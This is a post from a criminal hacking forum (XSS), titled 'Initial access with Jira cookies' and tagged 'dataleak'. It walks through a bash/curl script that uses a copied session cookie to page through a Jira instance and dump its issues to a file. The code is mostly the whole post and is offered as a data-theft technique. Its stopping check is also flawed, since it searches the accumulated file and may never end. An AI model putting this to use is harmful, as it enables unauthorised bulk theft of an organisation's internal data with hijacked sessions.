• XSS.stack #1 – первый литературный журнал от юзеров форума

Initial access with Jira cookies

dataleak

RAID-массив
Пользователь
Регистрация
26.05.2024
Сообщения
65
Реакции
13
Депозит
0.0016 Ł
To scrape Jira without API access using a pager function in bash with cookie access, we can create a script that iterates through pages of Jira issues and collects data. Here’s a step-by-step guide to achieve this:

Prerequisites​

  1. Cookie: Obtain a valid cookie from your browser for authentication.
  2. Tools: Ensure you have curl and basic text processing tools (grep, awk, sed, etc.) installed on your system.

Steps​

1. Identify the URL Pattern​

Determine the URL pattern for the Jira issue pages. For example, if your Jira instance paginates issues, the URL might look something like this:


Код:
https://your_jira_instance_url/issues/?jql=project=YOUR_PROJECT_KEY&startAt=0

Here, startAt parameter controls pagination.

2. Retrieve Cookie​

From your browser’s developer tools, copy the value of the Cookie header from a request to the Jira instance.

3. Write the Bash Script​

Create a bash script that uses a pager function to iterate through the pages. Below is an example script:

bash
Код:
#!/bin/bash

# Define variables
JIRA_BASE_URL="https://your_jira_instance_url/issues/?jql=project=YOUR_PROJECT_KEY"
COOKIE="your_cookie_value"
USER_AGENT="your_user_agent"
OUTPUT_FILE="jira_issues.html"
PAGE_SIZE=50 # Number of issues per page (adjust as needed)

# Initialize output file
echo "" > $OUTPUT_FILE

# Function to fetch a page of issues
fetch_page() {
local start_at=$1
local url="${JIRA_BASE_URL}&startAt=${start_at}"

echo "Fetching: ${url}"
curl -s -b "$COOKIE" -H "User-Agent: $USER_AGENT" "$url" >> $OUTPUT_FILE
}

# Pager function to iterate through pages
pager() {
local start_at=0

while :; do
fetch_page $start_at

# Check if the page contains issues; if not, break the loop
if ! grep -q "nextPageUrl" $OUTPUT_FILE; then
break
fi

start_at=$((start_at + PAGE_SIZE))
done
}

# Run the pager function
pager

# Optional: Process the HTML output
# For example, extracting files, issue titles, IDs, or other details using grep, awk, sed, etc.

echo "Scraping complete. Output saved to $OUTPUT_FILE."

Explanation​

  1. Variables:
    • JIRA_BASE_URL: The base URL for the Jira issues.
    • COOKIE: The cookie for authentication.
    • USER_AGENT: The user agent string to mimic a browser.
    • OUTPUT_FILE: The file where the output will be saved.
    • PAGE_SIZE: The number of issues per page (adjust according to your Jira configuration).
  2. Initialization:
    • Initialize the output file by clearing its content.
  3. fetch_page Function:
    • Takes a start_at parameter to fetch the page starting at that index.
    • Constructs the URL with the startAt parameter.
    • Uses curl to fetch the page and append the response to the output file.
  4. pager Function:
    • Starts at 0 and fetches pages in a loop.
    • Calls fetch_page with the current start_at value.
    • Checks if the fetched page contains a "nextPageUrl" indicator to continue fetching or break the loop if there are no more pages.
  5. Run the pager Function:
    • Calls the pager function to start scraping.
  6. Processing the Output (Optional):
    • After scraping, you can process the HTML output as needed. For example, extracting specific information using grep, awk, or sed.

Running the Script​

Make sure the script is executable and run it:

bash

Код:
chmod +x jira_scrape.sh
./jira_scrape.sh

This approach will scrape the Jira pages by iterating through the paginated results, using a cookie for authentication, and saving the combined HTML output to a file. You can then further process the output file to extract the required information. Adjust the parsing part according to the HTML structure of your specific Jira instance.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх